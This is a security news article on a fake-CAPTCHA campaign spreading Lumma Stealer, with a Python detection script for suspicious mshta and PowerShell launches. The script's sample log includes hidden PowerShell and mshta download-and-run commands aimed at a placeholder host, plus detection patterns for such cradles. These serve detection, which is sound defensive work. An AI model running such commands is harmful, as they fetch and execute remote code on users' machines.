
Routine Interactions, Extraordinary Threats: The Rise of Fake CAPTCHA Malware

Cybercriminals have launched a global malware campaign that has already impacted over 1.4 million users across multiple industries. Leveraging fake CAPTCHA verification pages, the attackers deploy the Lumma Stealer, a powerful information-stealing malware designed to exfiltrate sensitive data. The campaign utilizes advanced social engineering and malvertising tactics to bypass traditional security defenses by exploiting users' trust in routine web interactions. Victims have been identified in countries including the United States, Colombia, the Philippines, and Argentina.

In October 2024, researchers uncovered a malware campaign that used fake CAPTCHAs to deceive users. These fraudulent verification tools, typically designed to distinguish humans from bots, were manipulated to exploit users’ instinct to click through security prompts quickly. Experts from Russian cybersecurity firm Kaspersky reported that this campaign primarily targeted users through online ads, adult sites, file-sharing platforms, betting websites, anime hubs, and web apps that monetize traffic.

Earlier versions of the operation had focused on gamers, distributing information-stealing malware through websites offering cracked games. This recent iteration expanded its scope, posing a broader threat to unsuspecting users.

At first glance, the attack appears mundane: victims encounter what looks like a CAPTCHA verification screen, a familiar sight for most internet users. By employing obfuscated JavaScript to deliver the commands, the attackers help the malicious payload evade detection during execution. The infection chain begins with malicious ads and ends with Lumma Stealer harvesting passwords, cookies, cryptocurrency wallets, and other sensitive information.

However, this is where the routine ends, and the deception begins.

  1. The Setup: Users are redirected to these fake CAPTCHA pages after clicking malicious ads embedded on compromised websites. These ads often mimic legitimate platforms, making them difficult to identify as malicious.
  2. The Trick: On these pages, victims are instructed to paste a command into the Windows Run dialog. This command, disguised as a harmless verification step, is a Trojan horse that enables the malware's next stage.
  3. The Execution: The command launches a hidden PowerShell script that downloads and installs the Lumma Stealer payload via tools like mshta.exe, an often-abused Windows utility. This marks the start of the malware's operation: quietly stealing sensitive data while evading detection.

Victims now include corporate employees, individual users, and potentially even government entities. No sector is immune. Against this backdrop, one of the most concerning aspects of the campaign is its ability to bypass security measures. The malware uses mshta.exe to execute malicious HTA files fetched from remote servers; because execution happens in a native Windows process rather than in the browser, browser-based security controls never see it. Lumma Stealer also tampers with the AmsiScanBuffer function in memory, effectively bypassing the Windows Antimalware Scan Interface (AMSI).
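The three-step chain above and the mshta.exe technique share one host-level fingerprint a defender can hunt for: a living-off-the-land binary (mshta.exe, powershell.exe) spawned directly by explorer.exe, which is what a Run-dialog launch looks like in process-creation telemetry, combined with a remote URL, an HTA file, or hidden-window and download-cradle switches on its command line. The following is an added example written for this article, not code from the article or from any vendor; the log format (pipe-separated "Key: value" fields) and the sample events, including the `example.invalid` host, are constructed for illustration, and real deployments would read Sysmon Event ID 1 or EDR process events instead.

```python
import re
from dataclasses import dataclass

# Legitimate Windows binaries the described chain abuses, plus common neighbours.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Hidden-window, encoded-command and download-cradle switches seen in such one-liners.
CRADLE_RE = re.compile(
    r"(-w(?:indow(?:style)?)?\s*hidden|-enc(?:odedcommand)?\b|\biex\b|"
    r"\binvoke-expression\b|\bdownloadstring\b|\birm\b|\biwr\b)",
    re.IGNORECASE,
)

# Constructed sample telemetry (not real events). Lines 1-2 mirror the chain in the
# article; line 3 is a benign installer using mshta locally; lines 4-5 are ordinary use.
SAMPLE_LOG = r"""
ParentImage: C:\Windows\explorer.exe|Image: C:\Windows\System32\mshta.exe|CommandLine: mshta https://example.invalid/verify.hta
ParentImage: C:\Windows\explorer.exe|Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine: powershell -w hidden -c "iex (irm https://example.invalid/p)"
ParentImage: C:\Program Files\Vendor\setup.exe|Image: C:\Windows\System32\mshta.exe|CommandLine: mshta C:\Program Files\Vendor\ui.hta
ParentImage: C:\Windows\explorer.exe|Image: C:\Windows\System32\notepad.exe|CommandLine: notepad C:\Users\alice\notes.txt
ParentImage: C:\Windows\explorer.exe|Image: C:\Windows\System32\cmd.exe|CommandLine: cmd /c dir
"""


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text: str) -> list[ProcessEvent]:
    """Parse the constructed '|'-separated 'Key: value' format into events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(part.split(": ", 1) for part in line.split("|"))
        events.append(ProcessEvent(fields["ParentImage"], fields["Image"],
                                   fields["CommandLine"]))
    return events


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the indicators present on one process-creation event."""
    image = basename(ev.image)
    if image not in LOLBINS:
        return []
    reasons = []
    cmd = ev.command_line
    if basename(ev.parent_image) == "explorer.exe":
        reasons.append("LOLBin spawned directly by explorer.exe (Run dialog pattern)")
    if URL_RE.search(cmd):
        reasons.append("remote URL on the command line")
    if image == "mshta.exe" and ".hta" in cmd.lower():
        reasons.append("mshta.exe executing an HTA file")
    if CRADLE_RE.search(cmd):
        reasons.append("hidden-window / encoded / download-cradle switches")
    return reasons


def detect(events: list[ProcessEvent], threshold: int = 2):
    """Events carrying at least `threshold` indicators; a single one is common in benign use."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in detect(parse_log(SAMPLE_LOG)):
        print(f"ALERT {basename(ev.image)}: {ev.command_line}")
        for r in reasons:
            print(f"   - {r}")
```

The two-indicator threshold is the design choice worth noting: explorer.exe spawning cmd.exe, or an installer running a local HTA, each happens in normal use, so neither alone should page anyone; the combination of a Run-dialog parent with a remote URL or cradle switches is what matches the campaign. On a suspected host, the same command strings are also recorded in the user's Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is a cheap artifact to check during triage.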

Where earlier versions of the operation targeted gamers through websites offering cracked games, this campaign has broadened its scope to multiple industries. Because Lumma Stealer exfiltrates passwords, cookies, and cryptocurrency wallets, the campaign's implications extend beyond individual users to corporate networks and proprietary information.

This is just the beginning. The threat will only escalate as attackers refine their techniques, leveraging advanced social engineering, fileless malware, and evasion tactics. The next wave of attacks could exploit even more ubiquitous tools, pushing boundaries to infiltrate critical systems and infrastructures.
